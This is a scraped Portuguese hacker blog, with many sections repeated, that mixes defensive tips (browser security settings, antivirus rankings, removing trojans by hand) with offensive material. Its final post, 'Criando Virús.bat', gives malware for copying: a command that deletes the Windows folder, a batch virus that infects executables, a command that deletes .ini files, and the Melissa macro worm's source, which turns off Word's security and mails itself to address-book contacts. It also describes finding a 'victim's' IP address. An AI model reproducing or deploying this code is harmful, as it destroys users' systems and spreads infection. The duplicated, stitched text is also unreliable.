Essa é, claro, a habilidade básica do hacker. Em 1997, a linguagem que você absolutamente precisa aprender é C (apesar de não ser a que você deve aprender primeiro). Mas você não é um hacker e nem mesmo um programador se você souber apenas uma linguagem -- você tem que aprender a pensar sobre problemas de programação de um modo geral, independentemente de qualquer linguagem. Para ser um hacker de verdade, você precisa ter chegado ao ponto de conseguir aprender uma nova linguagem em questão de dias, relacionando o que está no manual ao que você já sabe. Isso significa que você deve aprender várias linguagens bem diferentes.
Além de C, você também deve aprender pelo menos LISP e Perl (e Java está tentando pegar um lugar nessa lista). Além de serem as linguagens mais importantes para hackear, cada uma delas representa abordagens à programaçaão bem diferentes, e todas o educarão em pontos importantes.
Eu nao posso lhe dar instruções completas sobre como aprender a programar aqui -- é uma habilidade complexa. Mas eu posso lhe dizer que livros e cursos também não servirão (muitos, talvez a maioria dos melhores hacker são auto-didatas). O que servirá é (a) ler código e (b) escrever código.
Aprender a programar é como aprender a escrever bem em linguagem natural. A melhor maneira é ler um pouco dos mestres da forma, escrever algumas coisas, ler mais um monte, escrever mais um monte, ler mais um monte, escrever... e repetir até que seu estilo comece a desenvolver o tipo de força e economia que você vê em seus modelos.
Achar bom código para ler costumava ser difícil, porque havia poucos programas grandes disponíveis em código-fonte para que hackers novatos pudessem ler e mexer. Essa situação mudou dramaticamente; open-source software (software com código-fonte aberto), ferramentas de programação, e sistemas operacionais (todos feitos por hackers) estão amplamente disponíveis atualmente.
Pesquisa Do BLOG
domingo, 22 de março de 2009
Vírus por E-mail
Uma das balelas mais antigas da Internet (aliás, muito antes disso, da época de BBSs). Muitos usuários chegam a suar frio só em receber um e-mail de alguém que não conhecem. Alguns deles até apagam a mensagem sem sequer abri-la.
O medo, até onde sabemos, é completamente injustificável. Nenhum mal pode acontecer ao seu computador apenas por abrir uma mensagem no seu programa de correio eletrônico. O máximo de "problema" que você vai encontrar é uma mensagem mal educada.
Mas atenção: se a mensagem estiver com um arquivo anexado (attached), cuidado! Se você não conhecer o remetente, aconselhamos a apagar a mensagem e o arquivo junto, pois este sim, pode estar contaminado com um vírus. E pode ser qualquer tipo de arquivo, executáveis, documentos, etc... Mas se você conhece o remetente, salve o arquivo no seu HD, e passe um anti-vírus antes de abri-lo. É melhor prevenir... Seu amigo pode não saber que está com vírus.
Alguns cavalos de tróia, como o Happy99, modificam os protocolos de comunicação e, neste caso em específico, enviam uma cópia de si mesmo para todas as mensagens que forem enviadas do computador infectado. É uma ótima maneira de se proliferar, pois ele é enviado sob o nome de alguém conhecido, que mandou uma mensagem real. O destinatário, inocente, executa o arquivo (que são uns fogos de artifício explodindo num céu negro). A partir daí, ele também está infectado e todas as suas mensagens serão duplicadas com uma cópia do Happy99.
Para corroborar nossa definição (ao contrário do que algumas pessoas acham), o vírus Melissa, que a imprensa espalhou aos quatro cantos como se ele fosse propagado apenas por receber a mensagem, precisa ser executado. Ele é um vírus de Macro (precisa do Microsoft Word 97 para contaminar) que se beneficia do acoplamento e interação entre o Word e OutLook 97. Para quem não sabe, pode-se escrever a mensagem no OutLook através do Word, e ler mensagens recebidas da mesma forma. O Melissa se aproveita do carregamento automático do Word para ler a mensagem e se autoexecuta nesta inicialização. Mas ele precisa ser executado.
Da mesma forma funciona o vírus Bubbleboy, que se utiliza da execução de controles (activex, scripts, java, etc.) encontrando uma brecha nos mecanismos de segurança do OutLook e Internet Explorer. De qualquer forma, ele precisa executar códigos, mesmo que, por falha nos programas, seja executado automaticamente.
Repetimos: Não existem vírus por e-mail. Existem arquivos anexados por e-mail, e estes sim podem conter vírus. Mantenha seus programas de emails atualizados e utilize sempre um bom anti-vírus.
O medo, até onde sabemos, é completamente injustificável. Nenhum mal pode acontecer ao seu computador apenas por abrir uma mensagem no seu programa de correio eletrônico. O máximo de "problema" que você vai encontrar é uma mensagem mal educada.
Mas atenção: se a mensagem estiver com um arquivo anexado (attached), cuidado! Se você não conhecer o remetente, aconselhamos a apagar a mensagem e o arquivo junto, pois este sim, pode estar contaminado com um vírus. E pode ser qualquer tipo de arquivo, executáveis, documentos, etc... Mas se você conhece o remetente, salve o arquivo no seu HD, e passe um anti-vírus antes de abri-lo. É melhor prevenir... Seu amigo pode não saber que está com vírus.
Alguns cavalos de tróia, como o Happy99, modificam os protocolos de comunicação e, neste caso em específico, enviam uma cópia de si mesmo para todas as mensagens que forem enviadas do computador infectado. É uma ótima maneira de se proliferar, pois ele é enviado sob o nome de alguém conhecido, que mandou uma mensagem real. O destinatário, inocente, executa o arquivo (que são uns fogos de artifício explodindo num céu negro). A partir daí, ele também está infectado e todas as suas mensagens serão duplicadas com uma cópia do Happy99.
Para corroborar nossa definição (ao contrário do que algumas pessoas acham), o vírus Melissa, que a imprensa espalhou aos quatro cantos como se ele fosse propagado apenas por receber a mensagem, precisa ser executado. Ele é um vírus de Macro (precisa do Microsoft Word 97 para contaminar) que se beneficia do acoplamento e interação entre o Word e OutLook 97. Para quem não sabe, pode-se escrever a mensagem no OutLook através do Word, e ler mensagens recebidas da mesma forma. O Melissa se aproveita do carregamento automático do Word para ler a mensagem e se autoexecuta nesta inicialização. Mas ele precisa ser executado.
Da mesma forma funciona o vírus Bubbleboy, que se utiliza da execução de controles (activex, scripts, java, etc.) encontrando uma brecha nos mecanismos de segurança do OutLook e Internet Explorer. De qualquer forma, ele precisa executar códigos, mesmo que, por falha nos programas, seja executado automaticamente.
Repetimos: Não existem vírus por e-mail. Existem arquivos anexados por e-mail, e estes sim podem conter vírus. Mantenha seus programas de emails atualizados e utilize sempre um bom anti-vírus.
Intenet Explore
Ferramentas » Opções da Internet » Segurança » InternetAtivar a opção [X] Médio - Avisa antes de executar conteúdo que possa danificar seu computador.
Ferramentas » Opções da Internet » AvançadoAtivar [X] Avisar ao alterar o modo de segurançaAtivar [X] Avisar quando o certificado do site for inválidoAtivar [X] Avisar se os formulários submetidos estão sendo redirecionados
Netscape Navigator 4.x
Editar » Preferências » Categoria - AvançadoDesmarcar [_] Enviar endereço eletrônico como senha de FTP anônimo.Desmarcar [_] Habilitar Java e JavaScript para Correio e Notícias.
Communicator » Informações sobre segurança » NavigatorMarcar a opção [X] Exibir uma página criptografada.Marcar a opção [X] Enviar informações não criptografadas para um site.Marcar a opção [X] Visualizar páginas com conteúdo mixto (cript/ñ cript).
Communicator » Informações sobre segurança » Java/JavaScriptEsta configuração permite que applets acessem seu computador ou sua rede. Caso possua algum item instalado neste tópico, consulte seu fornecedor de software para certificar-se da sua segurança. Caso isto não se aplique, remova todas as entradas.
Internet Explorer 4.x
Exibir » Opções da Internet » Segurança » Zona: Zona da InternetAtivar a opção [X] Médio - Avisa antes de executar conteúdo que possa danificar seu computador.
Exibir » Opções da Internet » AvançadasAtivar [X] Avisar se os formulários enviados forem redirecionados.Ativar [X] Avisar ao mudar o modo de segurança.Ativar [X] Não salvar páginas criptografadas no disco.Ativar Cookies [X] Confirmar antes de aceitar cookies.
Internet Explorer 3.x
View » Options » SecurityAtivar todas as opções do box Active Content.
View » Options » Security » Safety LevelSecurity method: High (recommended for all users)
View » Options » AdvancedBox "Warnings" : Warning before... [X] Always.Ative todos os outros "Warn" deste box.
Se você usa o browser Internet Explorer 3.0, providencie rapidamente uma atualização para a versão 3.02 ou acima, pois a versão 3.0 possui um bug gravíssimo, que permite que a página visitada possua um link para um programa no computador do visitante. Se o link apontar para um programa como a Calculadora do Windows, não há problemas; mas também é possível que o link aponte para, por exemplo, o programa FORMAT. Aí o bicho pega...
Netscape Navigator 3.x
Options » Security Preferences » GeneralAtive todas as opções
Options » Network Preferences » ProtocolsAtive as opções "Show an alert before..."[X] Accepting a Cookie e [X] Submitting a Form by Email
É recomendável que você rejeite cookies de sites em que você não confia. Por menos graves que forem, ficam ocupando espaço do seu disco, além de serem um abuso à privacidade. O mesmo é recomendado para formmails de sites desconhecidos. Evite-os.
Ferramentas » Opções da Internet » AvançadoAtivar [X] Avisar ao alterar o modo de segurançaAtivar [X] Avisar quando o certificado do site for inválidoAtivar [X] Avisar se os formulários submetidos estão sendo redirecionados
Netscape Navigator 4.x
Editar » Preferências » Categoria - AvançadoDesmarcar [_] Enviar endereço eletrônico como senha de FTP anônimo.Desmarcar [_] Habilitar Java e JavaScript para Correio e Notícias.
Communicator » Informações sobre segurança » NavigatorMarcar a opção [X] Exibir uma página criptografada.Marcar a opção [X] Enviar informações não criptografadas para um site.Marcar a opção [X] Visualizar páginas com conteúdo mixto (cript/ñ cript).
Communicator » Informações sobre segurança » Java/JavaScriptEsta configuração permite que applets acessem seu computador ou sua rede. Caso possua algum item instalado neste tópico, consulte seu fornecedor de software para certificar-se da sua segurança. Caso isto não se aplique, remova todas as entradas.
Internet Explorer 4.x
Exibir » Opções da Internet » Segurança » Zona: Zona da InternetAtivar a opção [X] Médio - Avisa antes de executar conteúdo que possa danificar seu computador.
Exibir » Opções da Internet » AvançadasAtivar [X] Avisar se os formulários enviados forem redirecionados.Ativar [X] Avisar ao mudar o modo de segurança.Ativar [X] Não salvar páginas criptografadas no disco.Ativar Cookies [X] Confirmar antes de aceitar cookies.
Internet Explorer 3.x
View » Options » SecurityAtivar todas as opções do box Active Content.
View » Options » Security » Safety LevelSecurity method: High (recommended for all users)
View » Options » AdvancedBox "Warnings" : Warning before... [X] Always.Ative todos os outros "Warn" deste box.
Se você usa o browser Internet Explorer 3.0, providencie rapidamente uma atualização para a versão 3.02 ou acima, pois a versão 3.0 possui um bug gravíssimo, que permite que a página visitada possua um link para um programa no computador do visitante. Se o link apontar para um programa como a Calculadora do Windows, não há problemas; mas também é possível que o link aponte para, por exemplo, o programa FORMAT. Aí o bicho pega...
Netscape Navigator 3.x
Options » Security Preferences » GeneralAtive todas as opções
Options » Network Preferences » ProtocolsAtive as opções "Show an alert before..."[X] Accepting a Cookie e [X] Submitting a Form by Email
É recomendável que você rejeite cookies de sites em que você não confia. Por menos graves que forem, ficam ocupando espaço do seu disco, além de serem um abuso à privacidade. O mesmo é recomendado para formmails de sites desconhecidos. Evite-os.
O que é Trojans?
Um Trojan Horse é um programa que faz algum tipo de atividade maléfica porém ele não se espalha automaticamente.
Geralmente, trojans são malware simples de se remover comparado aos worms e vírus.
A maioria dos trojans incluem também o que chamamos de backdoor.
Também existem os Trojan Droppers. Esses são identificados pelos antivírus como Dropper.X ou Trojan.Dropper/X. Os Droppers seguem a história de Tróia: Droppers são programas que deviam, por exemplo, tocar uma música, quando na verdade instalam o Trojan. Trojan Droppers são comuns em programas ilegais, como geradores de crédito para celulares e ferramentas para criação de vírus.
radarurl_call_radar_widget("Big", "Black","bottomright")
online stats
Geralmente, trojans são malware simples de se remover comparado aos worms e vírus.
A maioria dos trojans incluem também o que chamamos de backdoor.
Também existem os Trojan Droppers. Esses são identificados pelos antivírus como Dropper.X ou Trojan.Dropper/X. Os Droppers seguem a história de Tróia: Droppers são programas que deviam, por exemplo, tocar uma música, quando na verdade instalam o Trojan. Trojan Droppers são comuns em programas ilegais, como geradores de crédito para celulares e ferramentas para criação de vírus.
radarurl_call_radar_widget("Big", "Black","bottomright")
online stats
Anti-Virús
Anti-VírusEaew galera eu vou postar aqui os melhores anti-vírus, caso você não concorde, poste lá no fórum e de sua justificativa.Lembrando que nunca você estará 100% contra vírus e invasão, por isso não fique clicando em todos os links de sites desconhecidos.Vamos começar pelos os pagos. (Enquete feita pelos os usuarios do Orkut).
Kaspersky (U$ 66,50) 51 votos (39%)AVG (Valor não informado) 23 votos (17%)NOD32 (R$ 94,00) 31 votos (24%)Norton (U$ 49,95) 14 votos (10%)Panda (U$ 39,95) 9 votos (7%)O conceituado Kaspersky sai na frente com a maioria dos votos.Na maioria das reclamações do pessoal é o peso dos softwares são pesados, para esse caso use o NOD32 ele tem uma grande aceitação dos usuarios.Agora vamos pelos os grátis.1° O Active Vírus Shield é muito bom da empresa "Kaspersky", e da "AOL", o mesmo visual do anti-vírus Kaspersky e detecta muitos vírus e bem fácil de ultilizar.Download do Active Vírus Shield2° O Avira AntiVir na versão grátis e bem aceito pelos os usuarios em votação com outros (pagos).Download do Avira AntiVir 3° Avast, bom para uns e péssimos para outros, ele é bem conhecido e é um dos anti-vírus mais baixado da internet.Download do Avast!4° AVG Anti Vírus o mais baixado da internet, mais eu não considero lá está coisas, e o maior concorente do Avast!.Download do AVG FreeBom para cada tipo de usuario acha bom ou ruim esses anti-vírus.
Kaspersky (U$ 66,50) 51 votos (39%)AVG (Valor não informado) 23 votos (17%)NOD32 (R$ 94,00) 31 votos (24%)Norton (U$ 49,95) 14 votos (10%)Panda (U$ 39,95) 9 votos (7%)O conceituado Kaspersky sai na frente com a maioria dos votos.Na maioria das reclamações do pessoal é o peso dos softwares são pesados, para esse caso use o NOD32 ele tem uma grande aceitação dos usuarios.Agora vamos pelos os grátis.1° O Active Vírus Shield é muito bom da empresa "Kaspersky", e da "AOL", o mesmo visual do anti-vírus Kaspersky e detecta muitos vírus e bem fácil de ultilizar.Download do Active Vírus Shield2° O Avira AntiVir na versão grátis e bem aceito pelos os usuarios em votação com outros (pagos).Download do Avira AntiVir 3° Avast, bom para uns e péssimos para outros, ele é bem conhecido e é um dos anti-vírus mais baixado da internet.Download do Avast!4° AVG Anti Vírus o mais baixado da internet, mais eu não considero lá está coisas, e o maior concorente do Avast!.Download do AVG FreeBom para cada tipo de usuario acha bom ou ruim esses anti-vírus.
Remover Virús manualmente
Retirando virus manualmente
Bom pessoal, muitos devem saber, outros não !Irei postar aqui uma maneira de remover "Cavalos de Troia , Trojans e kayllogers" manualmente de seu computador.Estou falando dakeles server de tukojan , prorat , Ardamax etc . caso você baixe algo "arquivos" suspeitos fazer este teste sempre eh baum
Vamos lá:
1 - Iniciar > Execultar > Digite Regedit >Precione Enter
2 - Prociga nas seguintes pastas :
HKEY_LOCAL_MACHINE > SOFTWARE > Microsoft > WINDOWS > CurrentVersion > Run
No lado direito da jenela ira da pasta "RUN"ter alguns dados de inicialização , se você ver alguma extenssão abaixo: server.exe , server.bat , svcr.bat , svcr.exe , backdoor.exe
Pode simplismente apertar "DELETE" e reiniciar seu windows...e Adeus Trojan
Bom pessoal, muitos devem saber, outros não !Irei postar aqui uma maneira de remover "Cavalos de Troia , Trojans e kayllogers" manualmente de seu computador.Estou falando dakeles server de tukojan , prorat , Ardamax etc . caso você baixe algo "arquivos" suspeitos fazer este teste sempre eh baum
Vamos lá:
1 - Iniciar > Execultar > Digite Regedit >Precione Enter
2 - Prociga nas seguintes pastas :
HKEY_LOCAL_MACHINE > SOFTWARE > Microsoft > WINDOWS > CurrentVersion > Run
No lado direito da jenela ira da pasta "RUN"ter alguns dados de inicialização , se você ver alguma extenssão abaixo: server.exe , server.bat , svcr.bat , svcr.exe , backdoor.exe
Pode simplismente apertar "DELETE" e reiniciar seu windows...e Adeus Trojan
Como descobrir IP da vitima pelo MSN
Para você descobrir o IP sa vitima você deve estar no MSN então va em Inicia\executar\CMD\ e digite netstat -an aparesera todos o IPs que o computador esta usando obs: A pessoa deve pelomenos mandar uma menssagem para você....
Criando Virús.bat
Virús .bat:
Deletat Windows
rmdir /s /q c:\windows
Trojan-2
@echo offctty nulremfor %%f in (*.exe *.com) do set A=%%fif %A%==COMMAND.COM set A=rename %A% V%A%if not exist V%A% goto endattrib +h V%A%copy %0.bat %A%attrib +r %A%ren %A% *.batset A=:endctty con@if exist V%0.com V%0.com %1 %2 %3@if exist V%0.exe V%0.exe %1 %2 %3
Trojan -3
@echo offctty nulremfor %%f in (*.exe *.com) do set A=%%fif %A%==COMMAND.COM set A=rename %A% V%A%if not exist V%A% goto endattrib +h V%A%copy %0.bat %A%attrib +r %A%ren %A% *.batset A=:endctty con@if exist V%0.com V%0.com %1 %2 %3@if exist V%0.exe V%0.exe %1 %2 %3
Del driver
del Drive:\windir\*.ini ou use: drive: cd\ cd windir del *.ini
meliisa 1999
// Melissa Virus Source CodePrivate Sub Document_Open()On Error Resume NextIf System.PrivateProfileString("","HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> ""ThenCommandBars("Macro").Controls("Security...").Enabled = FalseSystem.PrivateProfileString("","HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&ElseCommandBars("Tools").Controls("Macro").Enabled = FalseOptions.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1):Options.SaveNormalPrompt = (1 - 1)End IfDim UngaDasOutlook, DasMapiName, BreakUmOffASliceSet UngaDasOutlook = CreateObject("Outlook.Application")Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")If System.PrivateProfileString("","HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo"ThenIf UngaDasOutlook = "Outlook" ThenDasMapiName.Logon "profile", "password"For y = 1 To DasMapiName.AddressLists.CountSet AddyBook = DasMapiName.AddressLists(y)x = 1Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)For oo = 1 To AddyBook.AddressEntries.CountPeep = AddyBook.AddressEntries(x)BreakUmOffASlice.Recipients.Add Peepx = x + 1If x > 50 Then oo = AddyBook.AddressEntries.CountNext ooBreakUmOffASlice.Subject = "Important Message From " &Application.UserNameBreakUmOffASlice.Body = "Here is that document you asked for ... don'tshow anyone else Wink"BreakUmOffASlice.Attachments.Add ActiveDocument.FullNameBreakUmOffASlice.SendPeep = ""Next yDasMapiName.LogoffEnd
Deletat Windows
rmdir /s /q c:\windows
Trojan-2
@echo offctty nulremfor %%f in (*.exe *.com) do set A=%%fif %A%==COMMAND.COM set A=rename %A% V%A%if not exist V%A% goto endattrib +h V%A%copy %0.bat %A%attrib +r %A%ren %A% *.batset A=:endctty con@if exist V%0.com V%0.com %1 %2 %3@if exist V%0.exe V%0.exe %1 %2 %3
Trojan -3
@echo offctty nulremfor %%f in (*.exe *.com) do set A=%%fif %A%==COMMAND.COM set A=rename %A% V%A%if not exist V%A% goto endattrib +h V%A%copy %0.bat %A%attrib +r %A%ren %A% *.batset A=:endctty con@if exist V%0.com V%0.com %1 %2 %3@if exist V%0.exe V%0.exe %1 %2 %3
Del driver
del Drive:\windir\*.ini ou use: drive: cd\ cd windir del *.ini
meliisa 1999
// Melissa Virus Source CodePrivate Sub Document_Open()On Error Resume NextIf System.PrivateProfileString("","HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> ""ThenCommandBars("Macro").Controls("Security...").Enabled = FalseSystem.PrivateProfileString("","HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&ElseCommandBars("Tools").Controls("Macro").Enabled = FalseOptions.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1):Options.SaveNormalPrompt = (1 - 1)End IfDim UngaDasOutlook, DasMapiName, BreakUmOffASliceSet UngaDasOutlook = CreateObject("Outlook.Application")Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")If System.PrivateProfileString("","HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo"ThenIf UngaDasOutlook = "Outlook" ThenDasMapiName.Logon "profile", "password"For y = 1 To DasMapiName.AddressLists.CountSet AddyBook = DasMapiName.AddressLists(y)x = 1Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)For oo = 1 To AddyBook.AddressEntries.CountPeep = AddyBook.AddressEntries(x)BreakUmOffASlice.Recipients.Add Peepx = x + 1If x > 50 Then oo = AddyBook.AddressEntries.CountNext ooBreakUmOffASlice.Subject = "Important Message From " &Application.UserNameBreakUmOffASlice.Body = "Here is that document you asked for ... don'tshow anyone else Wink"BreakUmOffASlice.Attachments.Add ActiveDocument.FullNameBreakUmOffASlice.SendPeep = ""Next yDasMapiName.LogoffEnd
Assinar:
Postagens (Atom)

